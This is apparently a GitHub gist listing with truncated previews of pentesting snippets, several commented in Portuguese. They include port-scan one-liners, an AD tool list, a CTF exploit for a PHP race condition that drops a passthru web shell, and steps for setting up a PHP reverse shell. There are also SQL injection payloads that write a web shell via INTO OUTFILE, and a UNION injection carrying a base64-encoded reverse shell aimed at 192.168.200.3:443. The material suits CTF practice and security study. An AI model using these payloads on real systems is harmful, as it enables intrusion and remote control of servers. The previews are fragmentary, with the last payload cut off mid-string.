This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
Script used to pull down the current video descriptions from ippsec's youtube channel. | |
The raw output still has a few HTML tags that need to be manually removed and there | |
also seem to be multiple duplicates of videos that have been removed in the output | |
saved as ippsec-details.txt | |
""" | |
import re | |
import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#NMAP | |
nmap -T5 --host-timeout 4s --min-rate 1000 -PN -n -p <PORTAS> <SERVER> | |
#NETCAT | |
for i in {1..2000}; do nc -vz <SERVER> $i 2>&1 | grep -vi "failed"; done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Security Tool List | |
├───AD | |
│ ├───ACLPwn | |
│ ├───ACL_PWN | |
│ ├───ADAPE | |
│ ├───ADAudit | |
│ ├───ADCollector | |
│ ├───ADpwn | |
│ ├───ADRecon | |
│ ├───ADReconPowershell |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit | |
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
## passwords.txt payload content | |
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?> | |
import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re | |
from subprocess import Popen, PIPE, STDOUT |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
"""Simple HTTP Server With Upload. | |
This module builds on BaseHTTPServer by implementing the standard GET | |
and HEAD requests in a fairly straightforward manner. | |
see: https://gist.github.com/UniIsland/3346170 | |
""" | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@kbca# locate webshell | grep revers | |
/usr/share/webshells/jsp/jsp-reverse.jsp | |
/usr/share/webshells/perl/perl-reverse-shell.pl | |
/usr/share/webshells/php/php-reverse-shell.php | |
root@kbca# cp /usr/share/webshells/php/php-reverse-shell.php meu-lindo-shell.php | |
# >>>> Precisamos Substituir o IP e Porta <<<< | |
root@kbca# grep -i "CHANGE THIS" meu-lindo-shell.php | |
$ip = '127.0.0.1'; // CHANGE THIS |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
myusername=john&mypassword=-9334' OR 1908=1908 LIMIT 0,1 INTO OUTFILE | |
'/var/www/meu-lindo-shell.php' LINES TERMINATED BY | |
0x3c3f7068 (... todo o hexa aqui ...)-- - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php eval(base64_decode('<codigo em base64')); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
myusername=john&mypassword=-9334' OR 1908=1908 limit 0,0 union all select "<?php eval(base64_decode(",”'c2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4yMDAuMyc7ICAvLyBDSEFOR0UgVEhJUwokcG9ydCA9IDQ0MzsgICAgICAgLy8gQ0hBTkdFIFRISVMKJGNodW5rX3NpemUgPSAxNDAwOwokd3JpdGVfYSA9IG51bGw7CiRlcnJvcl9hID0gbnVsbDsKJHNoZWxsID0gJ3VuYW1lIC1hOyB3OyBpZDsgL2Jpbi9zaCAtaSc7CiRkYWVtb24gPSAwOwokZGVidWcgPSAwOwoKCmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewoJJHBpZCA9IHBjbnRsX2ZvcmsoKTsKCQoJaWYgKCRwaWQgPT0gLTEpIHsKCQlwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOwoJCWV4aXQoMSk7Cgl9CgkKCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwoJfQoKCWlmIChwb3NpeF9zZXRzaWQoKSA9PSAtMSkgewoJCXByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOwoJCWV4aXQoMSk7Cgl9CgoJJGRhZW1vbiA9IDE7Cn0gZWxzZSB7CglwcmludGl0KCJXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiAgVGhpcyBpcyBxdWl0ZSBjb21tb24gYW5kIG5vdCBmYXRhbC4iKTsKfQoKY2hkaXIoIi8iKTsKCnVtYXNrKDApOwoKCiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwppZiAoISRzb2NrKSB7CglwcmludGl0 |
OlderNewer